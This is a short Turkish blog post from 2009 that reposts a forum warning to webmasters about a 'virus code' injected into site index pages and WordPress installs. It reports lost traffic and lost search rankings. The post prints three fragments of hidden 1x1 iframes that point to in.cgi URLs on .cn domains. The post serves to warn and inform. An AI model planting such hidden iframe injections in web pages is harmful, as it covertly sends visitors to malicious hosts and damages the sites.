30 Ağustos 2009 Pazar

flaş haber

Bir başka webmaster forumununda gezinirken şu habere rastladım. Paylaşmak istedim. Dikkat edelim.

Haberin Detayı

Daha önce böyle bir Virüs kodu ile karşılaşmadığım için Forumdaki Webmaster arkadaşlarımı bilgilendirmek istedim.

Yaklaşık olarak 5 gündür 2k olan sitemin günlük hiti 600-700 tekil hit seviyesine geldi. Buda doğal olarak canımı sıktı. Bunun nedeni ne olabilir diye araştırırken daha önce hiç rastlamadığım ve ilk kez gördüğüm bir Virüs kodunun sitemin index`ine girmiş oldugunu farkettim. Kodu kaldırdıktan sonra sitemin günlük hitti eski seviyesine tekrar ulaştı.

Gözlemlediğim başka bir zararıda bu 5 gün öncesine kadar belli başlı aramalarada 1. sayfada olan alt sayfalarım nedenini bilmediğim bir şekilde ilgili aramalaradan komple yok olmuşlardı. Kodu kaldırdıktan 2 saat sonra bu sayfalarım tekrar eski yerlerine geldiler.

Bu kod sitenin hittini nasıl düşürüyor?
Siteye başka türlü zararı varmıdır?

Gibi olayın teknik sorunları hakkında bir bilgim yok. Fakat siteye %100 hit konusunda zararı olduğu kesindir.

Bu Konuyu Sadece Bilgilendirme Amaçlı Yazdım. Başınıza Böyle Bir Şey Gelirse Bilginiz Olsun Diye.

Saygılar...

İşte O Kod :


Kod:
http://perfectnamestore.cn/in.cgi?income7" width=1 height=1 style="visibility: hidden">

Evet Wordpress Sistemlere Kolayca Yayılabildiğini Farkettim. Sitemde 2 Tane Varmış Ve Site Açılmıyor. Kim Bilir Ne Zamandır Kapalı Sitem.

Virüsler Bunlar;

Kod:

Kod:
http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden">
http://betbigwager.cn/in.cgi?income63" width=1 height=1 style="visibility: hidden">


Alıntıdır.

Dikkat arkadaşlar...

Hiç yorum yok:

Yorum Gönder